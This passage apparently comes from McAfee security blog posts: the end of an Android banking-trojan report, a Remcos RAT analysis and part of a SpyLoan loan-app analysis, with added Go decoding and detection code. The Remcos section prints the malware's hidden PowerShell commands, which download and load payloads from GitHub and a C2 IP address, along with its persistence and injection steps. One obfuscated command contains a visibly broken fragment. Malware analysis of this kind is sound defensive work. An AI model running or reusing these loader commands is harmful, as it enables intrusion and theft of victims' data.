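CONSTRUCTED_REF = "abcdefghijklmnopqrst"
CONSTRUCTED_STRINGS = """
const-string v0, "https://%s.supabase.co/rest/v1/sms"
const-string v1, "%s"
const-string v2, "application/json"
""" % (CONSTRUCTED_REF, make_constructed_token(CONSTRUCTED_REF, "anon"))

if __name__ == "__main__":
    for key in find_supabase_keys(CONSTRUCTED_STRINGS):
        print(key["severity"], key["role"], key["api_base"], key["exp"])
```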

     

    During our investigation, we discovered a total of 5,558 records stored in the database. The first of these records was dated October 9, 2024. As previously mentioned, these records include 4,918 SMS messages and 623 entries of card information (number, expiration date, CVV) and bank information (account numbers, login credentials like ID and password).

    Figure 8. Examples of stolen data

    Uncovering variants by package prefix

    The initial sample we found had the package name “gs_5.customer”. Through investigation of their database, we identified 8 unique package prefixes. These prefixes provide critical clues about the potential scam themes associated with each package. By examining the package names, we can infer specific characteristics and likely focus areas of the various scam operations.

    Package Name        Scam Theme
    ax_17.customer      Axis Bank
    gs_5.customer       Gas Bills
    elect_5.customer    Electrical Bills
    icici_47.customer   ICICI Bank
    jk_2.customer       J&K Bank
    kt_3.customer       Karnataka Bank
    pnb_5.customer      Punjab National Bank
    ur_18.customer      Uttar Pradesh Co-Operative Bank

    Based on the package names, it seems that once a scam theme is selected, at least 2 different variants are developed within that theme. This variability not only complicates detection efforts but also increases the potential reach and impact of their scam campaigns.

    Mobile app management of C2

    Based on the information uncovered so far, we found that the malware actor has developed and is actively using an app to manage the C2 infrastructure directly from a device. This app can send commands to forward SMS messages from the victim’s active phones to specified numbers. This capability differentiates it from previous malware, which typically manages C2 servers via web interfaces. The app stores various configuration settings through Firebase. Notably, it utilizes Firebase “Realtime Database” rather than Firestore, likely due to its simplicity for basic data retrieval and storage.

    Figure 9. C2 management mobile application

     

    Conclusion

    Based on our research, we have confirmed that 419 unique devices have already been infected. However, considering the continual development and distribution of new variants, we anticipate that this number will steadily increase. This trend underscores the persistent and evolving nature of this threat, emphasizing the need for careful observation and flexible security strategies.

    As mentioned at the beginning of the report, many scams originate from messaging platforms like WhatsApp. Therefore, it’s crucial to remain cautious when receiving messages from unknown or uncertain sources. Additionally, given the clear emergence of various variants, we recommend using security software that can quickly respond to new threats. Furthermore, by employing McAfee Mobile Security, you can bolster your defense against such sophisticated threats.

    Indicators of Compromise (IOCs)

     

    APKs:

    SHA256 Package Name App Name
    b7209653e226c798ca29343912cf21f22b7deea4876a8cadb88803541988e941 gs_5.customer Gas Bill Update
    7cf38f25c22d08b863e97fd1126b7af1ef0fcc4ca5f46c2384610267c5e61e99 ax_17.customer Client Application
    745f32ef020ab34fdab70dfb27d8a975b03e030f951a9f57690200ce134922b8 ax_17.number Controller Application

    Domains:

    • https[://]luyagyrvyytczgjxwhuv.supabase.co

    Firebase:

    • https[://]call-forwarder-1-default-rtdb.firebaseio.com

    The post A New Android Banking Trojan Masquerades as Utility and Banking Apps in India appeared first on McAfee Blog.

    The Stealthy Stalker: Remcos RAT

    Authored By Sakshi Jaiswal, Anuradha M

    In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in the world of cybersecurity, gaining traction with its ability to infiltrate systems and compromise sensitive data. This malware, often delivered through phishing emails and malicious attachments, allows cybercriminals to remotely control infected machines, making it a powerful tool for espionage, data theft, and system manipulation. As cyberattacks become more sophisticated, understanding the mechanisms behind Remcos RAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two Remcos RAT variants.

    The heat map below illustrates the prevalence of Remcos in the field in Q3 2024.

     

    Figure 1: Remcos heat map

    Variant 1:

    In the first variant of Remcos, executing a VBS file triggers a highly obfuscated PowerShell script that downloads multiple files from a command-and-control (C2) server. These files are then executed, ultimately leading to their injection into RegAsm.exe, a legitimate Microsoft .NET executable.

    Infection Chain

    Figure 2: Infection Chain of variant 1

    Analysis:

    Executing the VBS file initially triggers a long, heavily obfuscated PowerShell command.

    Figure 3: Obfuscated PowerShell command 

     

    It uses multi-layer obfuscation; after de-obfuscation, the final readable content is shown below.

    Figure 4: De-Obfuscated code

     

    The de-obfuscated PowerShell script performs the following actions:

    1. First, the script checks whether the PowerShell version is 2.0. If it is, a file is downloaded from Google Drive (‘https://drive.google.com/uc?export=download&id=’) into the Temp location; if it is not 2.0, the script downloads strings from an FTP server instead.
    2. It creates a copy of itself in the startup location: \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

    Figure 5: Self-copy location 

     

    1. In this case, since the PowerShell version is not 2.0, it downloads strings from the FTP server.
    2. It uses FTP to download the file DLL01.txt from “ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt”, with the username desckvbrat1 and the password ******************* hardcoded in the PowerShell script. We used FileZilla with the same username and password to retrieve the files.

    Figure 6: Download file from FTP server 

     

    1. There are three files, DLL01.txt, Entry.txt and Rumpe.txt, each containing a URL that gives direct access to a snippet hosted on the PasteCode.io platform.

    DLL01.txt File

    Figure 7: DLL01.txt content 

     

    Figure 8: Snippet which is hosted on PasteCode.io of DLL01.txt


    The snippet above is encoded; after decoding it, we are left with the ClassLibrary3.dll file.

    Figure 9: ClassLibrary3.dll

    Rumpe.txt String

    Figure 10: Rumpe.txt content 

    Figure 11: Snippet which is hosted on PasteCode.io of Rumpe.txt

     

    The snippet above is encoded; decoding it yields the ClassLibrary1.dll file.

    Figure 12: ClassLibrary1.dll

    Entry.txt

    Figure 13: Entry.txt content

     

    Figure 14: Snippet which is hosted on PasteCode.io of Entry.txt

     

    1. Last line of the long PowerShell script: [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(‘ClassLibrary3.Class1’).GetMethod( ‘prFVI’ ).Invoke( $null , [object[]] ( ‘txt.sz/moc.gnitekrame-uotenok//:sptth‘ , $hzwje , ‘true’ ) ); This line loads a .NET assembly into the current application domain and invokes a method on it.
    2. “txt.sz/moc.gnitekrame-uotenok//:sptth” is a reversed URL. When reversed, it becomes: https://koneotemarket.com/zst.txt. The raw data hosted at that location is base64 encoded and stored in reversed order. Once decoded and reversed, the content is invoked for execution.

    Figure 15: Base64 encoded Content
     
    1. After invocation, it creates a directory in AppData/Local/Microsoft, specifically within the LocalLow folder. It then creates another folder named “System Update” and places three files inside it.

    The LocalLow folder is a directory in Windows used to store application data that requires low user permissions. It is located within the AppData folder. The two paths below show how closely the path used by the malware mimics this legitimate Windows path.

    Legitimate path: C:\Users\<YourUsername>\AppData\LocalLow

    Misleading path: C:\Users\<YourUsername>\AppData\Local\Microsoft\LocalLow

    In this case, a LocalLow folder has been created inside the Microsoft directory to mislead users into believing it is the legitimate LocalLow location.

    A screenshot of the files dropped into the System Update folder within the misleading LocalLow directory highlights the tactic used to mimic legitimate Windows directories, intending to evade user suspicion.

    Figure 16: Screenshot of dropped files into System Update directory

     

    Content of x3.txt

    Figure 17: x3.txt content 

     

    Then x2.ps1 is executed. Content of x2.ps1

    Figure 18: x2.ps1 content 

     

    The command adds a new registry entry in the Run key of the Windows Registry under HKCU (HKEY_CURRENT_USER). This entry ensures that a PowerShell script (yrnwr.ps1) located in the System Update folder inside the misleading LocalLow directory is executed at every user login.

    Figure 19: HKCU Run Registry entry for persistence 

     

    After adding the registry entry, it executes the yrnwr.ps1 file. The content of yrnwr.ps1 is obfuscated:

    Figure 20: Obfuscated PowerShell content

     

    After decoding yrnwr.ps1:

     

    Figure 21: De-obfuscated PowerShell content 

     

    Figure 22: Last line of script 

     

    It utilizes a process injection technique to inject the final Remcos payload into the memory of RegAsm.exe, a legitimate Microsoft .NET executable.

    Figure 23: Process Tree 

     

    Memory strings of RegAsm.exe show traces of Remcos:

    Figure 24: Keylogger related Strings in memory dump

     

    Figure 25: Remcos related String in memory dump

     

    Figure 26: Remcos Mutex creation String in memory dump 

     

    Mutex Created

    Figure 27: Mutex creation

     

    A log file is stored in the %ProgramData% directory, where a folder named “1210” is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities.

    Figure 28: Logs.dat file to capture all keystroke activity. 

     

    Figure 29: Strings in payload

     

    Finally, it deletes the original VBS sample from the system.

    Variant 2 – Remcos from Office Open XML Document:

    This variant of Remcos is delivered through an Office Open XML document: the .docx file arrives as an attachment to a spam email.

    Infection Chain:

    Figure 30: Infection Chain of variant 2

    Email Spam:

    Figure 31: Spam Email

     

    The email displayed in the above image contains an attachment in the form of a .docx file, which is an Office Open XML document.

    Analysis:

    From static analysis of the .docx file, we found that the malicious content is in the relationship file “settings.xml.rels”. Below is the content of the settings.xml.rels file:

    Figure 32: rels file content

     

    From the above content, it is evident that it downloads a file from an external resource that points to the URL hxxps://dealc.me/NLizza.

    The downloaded file is an RTF document with the unusually long filename “seethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc”.

    The RTF file is crafted to include CVE-2017-11882 Equation Editor vulnerability which is a remote code execution vulnerability that allows an attacker to execute arbitrary code on a victim’s machine by embedding malicious objects in documents.

    Upon execution, the RTF file downloads a VBS script from the URL “hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF” to the %appdata% directory, saving it as “picturewithmegetbacktouse.vbs”.

    Below is the content of VBS file:

    Figure 33: VBS Obfuscated content 

     

    Figure 34: VBS Obfuscated content 

     

    The VBScript is highly obfuscated, employing multiple layers of string concatenation to construct a command. It then executes that command using WScript.Shell.

    Below is the de-obfuscated code:

    Figure 35: De-Obfuscated Content 

     

    Figure 36: De-Obfuscated Content

     

    The above code shows that the VBS file launches PowerShell using Base64 encoded strings as the command.

    Below is the 1st PowerShell command line:

    “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -command $Codigo = ‘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’;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

    Base64 decoded content:

    Figure 37: Base64 decoded content

     

    The above base64 decoded content is used as input to the 2nd PowerShell command.

    Below is the 2nd PowerShell command line:

    “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -windowstyle hidden -executionpolicy bypass -NoProfile -command “. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+’x’-joIN”)(((‘{0}url ‘+’= {2}https://’+’ra’+’w.’+’gi’+’t’+’hu’+’bu’+’ser’+’con’+’ten’+’t’+’.com/No’+’D’+’e’+’t’+’ec’+’tOn/NoDet’+’ect’+’On/ref’+’s’+’/’+’heads/main/Detah’+’No’+’t’+’h’+’-V’+’.txt{2’+’};’+’ {0}ba’+’se’+’6’+’4C’+’ont’+’e’+’n’+’t = ‘+'(New’+’-Obj’+’e’+’c’+’t Sys’+’tem.Ne‘+’t.’+’Web’+’C’+’lient).D’+’o’+’wnl’+’oa’+’dStr’+’in’+’g(‘+'{‘+’0}u’+’rl); {‘+’0’+’}’+’binaryC’+’onte’+’n’+’t =’+’ ‘+'[S’+’yst’+’2024 – New ‘+’nve’+’rt’+’]’+’::F’+’romBase64Strin’+’g({0}base’+’6’+’4C’+’onte’+’nt’+’)’+’; {‘+’0}’+’ass’+’e’+’mbly’+’ =’+’ [‘+’Reflect’+’ion.Assembl’+’y]’+’::L’+’o’+’ad({0}bin’+’aryC’+’on’+’t’+’ent); [dnli’+’b.IO.Hom’+’e’+’]::VAI({‘+’1}’+’t’+’x’+’t.’+’CVFGGR/07/77’+’1.69.’+’43’+’1.1’+’9//’+’:p’+’tth{1’+’}, {‘+’1’+’}’+’desativado{1’+’}, {1}des’+’ati’+’vad’+’o{1}, {1}des’+’at’+’i’+’vado{1},’+’ {1’+’}Re’+’gA’+’s’+’m{‘+’1},’+’ {‘+’1}{‘+’1},’+'{1}{1})’)-f [cHaR]36,[cHaR]34,[cHaR]39) )”

    • The PowerShell script uses string obfuscation by combining parts of strings using join and concatenation. This hides the actual URL being fetched.
    • It constructs a URL that points to a raw GitHub file: hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

    Below is the content of “DetahNoth-V.txt”:

    Figure 38: Base64 encoded binary content 

     

    Below is the code snippet to decode the above Base64 string into binary format and load it into memory as a .NET assembly. This method avoids writing files to disk, which makes it harder for some security products to detect the operation.

    Figure 39: Code snippet to decode Base64 string 

     

    The decoded binary content leads to a DLL file named as “dnlib.dll”.

    Below is the last part of code in the 2nd PowerShell command line:

    Figure 40: Strings in PowerShell command

     

    Once the assembly “dnlib.dll” is loaded, it calls a method VAI from a type dnlib.IO.Home within the loaded assembly. This method is invoked with several arguments:

    • txt.CVFGGR/07/771.69.431.19//:ptth: This is a reversed URL (hxxp://91.134.96.177/70/RGGFVC.txt) that might point to another resource.
    • desativado (translated from Portuguese as “deactivated”): Passed multiple times as arguments. This is used as a parameter for deactivating certain functions.
    • RegAsm: This is the name of the .NET assembly registration tool, potentially indicating that the script is registering or working with assemblies on the machine.

    Below is the content of URL -hxxp://91.134.96.177/70/RGGFVC.txt:

    Figure 41: Base64-encoded binary payload

     

    The content shown above is a reversed, Base64-encoded binary payload, which, when decoded, results in the Remcos EXE payload.
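Both variants hide their next stage behind the same two tricks: URLs written backwards (the ‘//:sptth’ argument to ClassLibrary3 and the ‘//:ptth’ argument to dnlib.IO.Home::VAI) and payloads that are Base64-encoded and stored reversed (zst.txt, RGGFVC.txt). As an added example, not code from the McAfee analysis or from the malware, the Go program below recovers both: it hunts script text for the reversed scheme and restores the URL, and it decodes a staged blob trying both possible orders of operations, letting the MZ header decide which one was right. The payload bytes in main are constructed; the reversed URL token is the one quoted above.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Reverse returns s with its characters in reverse order.
func Reverse(s string) string {
	r := []rune(s)
	for i, j := 0, len(r)-1; i < j; i, j = i+1, j-1 {
		r[i], r[j] = r[j], r[i]
	}
	return string(r)
}

func reverseBytes(b []byte) {
	for i, j := 0, len(b)-1; i < j; i, j = i+1, j-1 {
		b[i], b[j] = b[j], b[i]
	}
}

// reversedURLToken matches a run of URL characters ending in "//:ptth" or
// "//:sptth", i.e. "http://" or "https://" written backwards. Storing URLs
// reversed defeats a naive search for "http", so the backwards scheme is
// the string worth hunting for in scripts and memory dumps.
var reversedURLToken = regexp.MustCompile(`[A-Za-z0-9./_-]+//:s?ptth`)

// FindReversedURLs scans script text and returns every reversed URL it
// finds, restored to normal reading order.
func FindReversedURLs(script string) []string {
	var urls []string
	for _, tok := range reversedURLToken.FindAllString(script, -1) {
		urls = append(urls, Reverse(tok))
	}
	return urls
}

// LooksLikePE reports whether data starts with the "MZ" DOS header that an
// EXE or DLL (the Remcos payload, dnlib.dll) begins with.
func LooksLikePE(data []byte) bool {
	return len(data) >= 2 && data[0] == 'M' && data[1] == 'Z'
}

// EncodeStagedPayload produces the hosted form described for zst.txt and
// RGGFVC.txt: Base64-encode the bytes, then reverse the text. It exists here
// only to build sample input for DecodeStagedPayload.
func EncodeStagedPayload(data []byte) string {
	return Reverse(base64.StdEncoding.EncodeToString(data))
}

// DecodeStagedPayload recovers a staged binary. "Base64 encoded and stored in
// reversed order" can mean either order of operations, so both are tried and
// the MZ header decides. The magic check is not optional: unpadded Base64
// text often decodes without error in the wrong order and yields garbage.
func DecodeStagedPayload(text string) ([]byte, error) {
	text = strings.TrimSpace(text)
	// Order 1: encoded then reversed -> reverse the text, then decode.
	if raw, err := base64.StdEncoding.DecodeString(Reverse(text)); err == nil && LooksLikePE(raw) {
		return raw, nil
	}
	// Order 2: bytes reversed then encoded -> decode, then reverse the bytes.
	if raw, err := base64.StdEncoding.DecodeString(text); err == nil {
		reverseBytes(raw)
		if LooksLikePE(raw) {
			return raw, nil
		}
	}
	return nil, errors.New("neither decoding order yields an MZ header")
}

func main() {
	// Constructed script line carrying the argument string quoted above (Figure 40).
	script := `[dnlib.IO.Home]::VAI('txt.CVFGGR/07/771.69.431.19//:ptth', 'desativado', 'RegAsm')`
	fmt.Println("reversed URLs:", FindReversedURLs(script))

	// Constructed stand-in for a staged payload; not a real binary.
	fake := []byte("MZ\x90\x00constructed-not-a-real-binary")
	got, err := DecodeStagedPayload(EncodeStagedPayload(fake))
	fmt.Printf("decoded %d bytes, PE header: %v, err: %v\n", len(got), LooksLikePE(got), err)
}
```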

    Indicators of Compromise (IOCs)

    Variant 1

    File Type SHA256
    Vbs d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2

    Variant 2

    File Type SHA256
    Eml 085ac8fa89b6a5ac1ce385c28d8311c6d58dd8545c3b160d797e3ad868c612a6
    Docx 69ff7b755574add8b8bb3532b98b193382a5b7cbf2bf219b276cb0b51378c74f
    Rtf c86ada471253895e32a771e3954f40d1e98c5fbee4ce702fc1a81e795063170a
    Vbs c09e37db3fccb31fc2f94e93fa3fe8d5d9947dbe330b0578ae357e88e042e9e5
    dnlib.dll 12ec76ef2298ac0d535cdb8b61a024446807da02c90c0eebcde86b3f9a04445a
    Remcos EXE 997371c951144335618b3c5f4608afebf7688a58b6a95cdc71f237f2a7cc56a2


    URLs

    hxxps://dealc.me/NLizza
    hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF
    hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
    hxxp://91.134.96.177/70/RGGFVC.txt


    Detections:

    Variant 1

    FileType Detection
    VBS Trojan:Script/Remcos.JD

    Variant 2

    FileType Detection
    Docx Trojan:Office/CVE20170199.D
    RTF Trojan:Office/CVE201711882.A
    VBS Trojan:Script/Remcos.AM
    Powershell Trojan:Script/Remcos.PS1
    EXE Trojan:Win/Genericy.AGP

    Conclusion

    In conclusion, the rise of Remcos RAT highlights the evolving nature of cyber threats and the increasing sophistication of malware. As this remote access Trojan continues to target consumers through phishing emails and malicious attachments, the need for proactive cybersecurity measures has never been more critical. By understanding the tactics used by cybercriminals behind Remcos RAT and implementing robust defenses such as regular software updates, email filtering, and network monitoring, organizations can better protect their systems and sensitive data. Staying vigilant and informed about emerging threats like Remcos RAT is essential in safeguarding against future cyberattacks.


    The post The Stealthy Stalker: Remcos RAT appeared first on McAfee Blog.

    SpyLoan: A Global Threat Exploiting Social Engineering

    Authored by: Fernando Ruiz

    The McAfee mobile research team recently identified a significant global increase of SpyLoan, also known as predatory loan apps, on Android. These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions,  which can lead to extortion, harassment, and financial loss. 

    During our investigation of this threat, we identified fifteen apps with a combined total of over eight million installations. This group of loan apps shares a common framework to encrypt and exfiltrate data from a victim’s device to a command and control (C2) server using a similar HTTP endpoint infrastructure. They operate localized to their targeted territories, mainly in South America, Southern Asia, and Africa, and some of them are promoted through deceptive advertising on social media.

    McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the apps discovered to Google who have notified the developers that their apps violate Google Play policies and fixes are needed to come into compliance. Some apps were suspended from Google Play while others were updated by the developers. 

    McAfee Mobile Security detects all of these apps as Android/PUP.SpyLoan under our PUP policy. Even after some of the apps were updated to reduce their permission requirements and the harvesting of sensitive information, they still pose a risk to users’ privacy because of the potentially unethical practices of their operators, who are not licensed or registered with the authorities that regulate financial services in the jurisdictions where they operate.

     

    Figure 1: Examples of SpyLoan apps recently distributed on Google Play

    Since 2020, SpyLoan has been a consistent presence in the mobile threat landscape. However, our telemetry indicates a rapid recent surge in activity: from the end of Q2 to the end of Q3 2024, the number of malicious SpyLoan apps and of unique infected devices increased by over 75%.

    Understanding the Threat

    What Are SpyLoan Apps?

    SpyLoan apps are intrusive financial applications that lure users with promises of quick and flexible loans, often featuring low rates and minimal requirements. While these apps may seem to offer genuine value, the reality is that these apps primarily exist to collect as much personal information as possible, which they then may exploit to harass and extort users into paying predatory interest rates. They employ questionable tactics, such as deceptive marketing that highlights time-limited offers and countdowns, creating a false sense of urgency to pressure users into making hasty decisions. Ultimately, rather than providing genuine financial assistance, these apps can lead users into a cycle of debt and privacy violations. 

    While the specific behavior may vary by country, these apps share common characteristics and code at app and infrastructure level: 

    • Distribution via Official App Stores: Despite violating policies, these apps often slip through app store vetting processes and are available on platforms like Google Play, making them appear trustworthy. 
    • Deceptive Marketing: They use names, logos, and user interfaces that mimic reputable financial institutions to gain credibility. These loan apps are often promoted by ads on social media networks.

    Figure 2: Ad for a SpyLoan app

    “High amount of loan” ad on Facebook for the app “Presta Facil: Revision Rapida” (which translates to “Easy Loan: Fast Approval”), detailing interest rate, amount, period, etc. for a loan in Colombian pesos.

    • Similar user flow: On first launch a privacy policy is displayed detailing the information that will be collected; then a countdown timer creates a sense of urgency to apply for the loan offer, and a phone number with the country code of the targeted territory is required to continue. A one-time password (OTP) is sent by SMS to authenticate the user and confirm that the phone number belongs to the targeted country.

    SpyLoan apps consistently follow this onboarding process. The navigation bar and app actions are then very similar across apps, with different graphics but the same features in their respective localized languages.

    Figure 3:  Example of privacy terms on two different SpyLoan apps, one targeting Indonesia (left) named “KreditKu-Uang Online” and another targeting Mexico (right) named “Préstamo Seguro-Rápido, Seguro”.

    Both apps have in common a framework that shares the user interface, user’s flow and encryption libraries with techniques for communication with C2 infrastructure, while the operators have different locations, language and target countries.

    • Privacy agreements: These apps have similar but not equal privacy terms, in general they describe and justify the sensitive data to be collected as part of the user identification process and anti-fraud measures.
      • They require users to consent to collect excessive and exploitative data that a formal financial institution would not normally require, such as SMS message content, call logs and contact lists.
      • The contact information for the “financial institution” uses a free email service domain such as Gmail or Outlook, like a personal email address, rather than that of a formal, licensed financial institution.
      • The websites hosting the privacy terms of these SpyLoan apps are built with the same web framework, using JavaScript to load the text of the terms dynamically; the text is not present in the HTML files directly.
    • Excessive Permission Requests: Upon installation, they request permissions that are unnecessary for a loan app, such as access to contacts, SMS, storage, calendar, phone call records and even microphone or camera.

    Common permissions on SpyLoan applications can be:

      • permission.CAMERA
      • permission.READ_CALL_LOG
      • permission.READ_PHONE_STATE
      • permission.ACCESS_COARSE_LOCATION
      • permission.READ_SMS

    Depending on the implementation and distribution method they can include more sensitive permissions.

    • Enticing Offers: Promising quick loans with minimal requirements to attract users in urgent financial situations. A countdown might be displayed to increase the sense of urgency.

    Figure 4: Three different apps, from different developers offering the same initial countdown onboarding screen: Offering an “85% approval rate” in different languages with a countdown.

    • Phone Validation via SMS OTP: To complete registration, a phone number with the country code of the target country is required to validate that the user’s phone is in the territory; a one-time password (OTP) is delivered by text message to proceed with registration.

    • Data Collection: Users are prompted to provide sensitive legal identification documents and personal information, bank account details and employment information, along with device data that is exfiltrated from the victim’s device.

    Impact on Users

    Financial Exploitation

    • Hidden Fees and High Interest Rates: Users receive less than the promised loan amount but are required to repay the full amount plus exorbitant fees within a short period.
    • Unauthorized Charges: Some apps initiate unauthorized transactions or charge hidden fees.

    Privacy Violations

    • Data Misuse: Personal information is exploited for blackmail or sold to third parties. This might include sextortion with victims’ pictures that can be exfiltrated or created with AI.
    • Harassment and Extortion: Users and their contacts receive threatening messages or calls including death threats.

    Emotional and Psychological Distress

    • Stress and Anxiety: Aggressive tactics cause significant emotional harm.
    • Reputational Damage: Public shaming can affect personal and professional relationships.

    Back in 2023, media in Chile reported the suicide of a victim of fake loans after harassment and threats against her friends and family and against her personal integrity.

    Data Exfiltration analysis

    The group of SpyLoan applications reported in this blog belongs to the family identified by McAfee as Android/SpyLoan.DE. It transmits the collected information to the command and control (C2) server over HTTPS, encrypted with AES (Advanced Encryption Standard) using 128-bit keys, then base64 encoded, optionally with a hardcoded padding added.

    Encryption key and initialization vector (IV) are hardcoded into the obfuscated application code.

    Figure 5: Encryption key and IV hardcoded in SpyLoan variant

    SpyLoan uses this same encryption routine to hide sensitive strings on resources.xml that leads to data exfiltration, for example:

    • String skadnjskdf in resources.xml:
      • <string name="skadnjskdf">501tm8gR24S8F8BpRDkvnw==</string>
    • The AES-decrypted value, using the same encryption routine implemented for data exfiltration:
      • <string name="skadnjskdf">content://sms/</string>

    This string is used to build a content URI that gives access to SMS messages. The code extracts fields such as date, address (sender/recipient), message body and status, formats them as JSON, and then encrypts the result again before sending it to the C2.

    Figure 6: Code section that exfiltrates all SMS messages from Victim’s device

    Exfiltrated data is posted to the C2 via HTTP POST inside an encrypted JSON object. The endpoints used to collect sensitive data share the same URL structure across different SpyLoan applications, which can be detected with this regex:

    ^https:\/\/[a-z0-9.-]+\/[a-z]{2,}-gp\/[a-z0-9]+\/[a-z0-9]+$

    Some examples of C2 URLs that match this scheme:

    • hxxps://su.mykreditandfear.com/her-gp/kgycinc/wjt
    • hxxps://hx.nihxdzzs.com/dz-gp/cfmwzu/uyeo
    • hxxps://prep.preprestamoshol.com/seg-gp/pdorj/tisqwfnkr
    • hxxps://tlon.pegetloanability.com/anerf-gp/jwnmk/dgehtkzh
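The string-hiding scheme above (AES with a 128-bit key and a hardcoded IV, then Base64) and the shared C2 URL shape are both things an analyst checks mechanically when triaging a new SpyLoan sample. As an added example, not SpyLoan’s code or McAfee’s, the Go program below implements that scheme so the obfuscated strings can be decrypted once a sample’s key and IV have been pulled from its code, and applies the regex above to candidate URLs. It assumes CBC mode with PKCS#7 padding, which the post does not state explicitly; the key and IV below are constructed placeholders, not values from any sample, so the resources.xml ciphertext quoted above will only decrypt with the real ones.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"regexp"
)

// Constructed placeholder key and IV. A real sample's values are the ones
// hardcoded in its obfuscated code (Figure 5); substitute them here.
var (
	ExampleKey = []byte("0123456789abcdef") // 16 bytes -> AES-128
	ExampleIV  = []byte("fedcba9876543210") // 16 bytes -> one AES block
)

func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("ciphertext is not a whole number of blocks")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size {
		return nil, errors.New("invalid padding byte")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("inconsistent padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptString mirrors the scheme: AES-128-CBC over the padded plaintext,
// then Base64. Assumed mode/padding, see the note above.
func EncryptString(key, iv []byte, plain string) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	if len(iv) != block.BlockSize() {
		return "", errors.New("IV must be exactly one block long")
	}
	padded := pkcs7Pad([]byte(plain), block.BlockSize())
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(out), nil
}

// DecryptString reverses EncryptString: Base64-decode, AES-128-CBC decrypt,
// strip PKCS#7 padding. A wrong key or IV normally fails at the unpad step.
func DecryptString(key, iv []byte, b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	if len(iv) != block.BlockSize() || len(raw) == 0 || len(raw)%block.BlockSize() != 0 {
		return "", errors.New("bad IV or ciphertext length")
	}
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(raw, raw) // decrypt in place
	plain, err := pkcs7Unpad(raw, block.BlockSize())
	if err != nil {
		return "", err
	}
	return string(plain), nil
}

// c2Pattern is the URL scheme given above, with the redundant slash escapes dropped.
var c2Pattern = regexp.MustCompile(`^https://[a-z0-9.-]+/[a-z]{2,}-gp/[a-z0-9]+/[a-z0-9]+$`)

// IsSpyLoanC2URL reports whether u has the shared SpyLoan collection-endpoint shape.
func IsSpyLoanC2URL(u string) bool {
	return c2Pattern.MatchString(u)
}

func main() {
	// "content://sms/" is 14 bytes: one padded block, 24 Base64 characters,
	// the same shape as the skadnjskdf value in resources.xml.
	enc, _ := EncryptString(ExampleKey, ExampleIV, "content://sms/")
	fmt.Println("encrypted:", enc, "len:", len(enc))
	dec, err := DecryptString(ExampleKey, ExampleIV, enc)
	fmt.Println("decrypted:", dec, err)
	for _, u := range []string{
		"https://su.mykreditandfear.com/her-gp/kgycinc/wjt", // endpoint listed above
		"https://example.com/api/v1/upload",                 // constructed benign URL
	} {
		fmt.Println(u, IsSpyLoanC2URL(u))
	}
}
```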

    Using the same technique and obfuscation methods, SpyLoan samples hide in their code the ability to exfiltrate large amounts of sensitive data from their victims, including:

    • Call Logs: Collects call log data from the device if permissions are granted
      • Number: The phone number of the caller
      • Type: Type of call (incoming, outgoing, missed)
      • Duration: The duration of the call
      • Date: The timestamp of the call
      • Name: The name of the contact (if available)
    • Files in download directory with metadata: file name, extension, file size, last modified timestamp
    • All accounts on the device, emails and social media accounts.
    • Information about all apps installed

    Other miscellaneous information collected:

    • Device and Network information:
      • Subscriber ID
      • DNS Information
      • Device ID (IMEI)
      • MAC address
      • Country code
      • Network Operator Name
      • Language
      • Network Type (Wi-Fi, 4G, 3G, etc.)
      • Phone number
      • Locale information (country code, display language)
      • Time Zone
      • Development Settings (enable or disable)
      • Phone Type (GSM, CDMA)
      • Elapsed Real-Time (The elapsed time since device was booted)
      • Proxy Configuration
    • SIM Information
      • SIM country ISO Code
      • SIM Serial Number (ICCID)
    • Location:
      • Permission: It checks for ACCESS_COARSE_LOCATION
      • Location provider: Check if GPS or network location are available
      • Last known location: Latitude or longitude
      • Geocoding information (converts latitude and longitude into a structured address):
        • Country name
        • Administrative area
        • City
        • Street
        • Address Line
      • Device configuration
        • Number of images: It counts the number of images files in external storage
        • Test Mode: reports if the device is in test mode
        • Keyboard Configuration
        • Current time
        • Enabled accessibility services flag
      • OS Settings:
        • Android version details (version, sdk level, fingerprint, id, display build)
        • Hardware information (device name, product name, device model, hardware details, device brand, board info, device serial number)
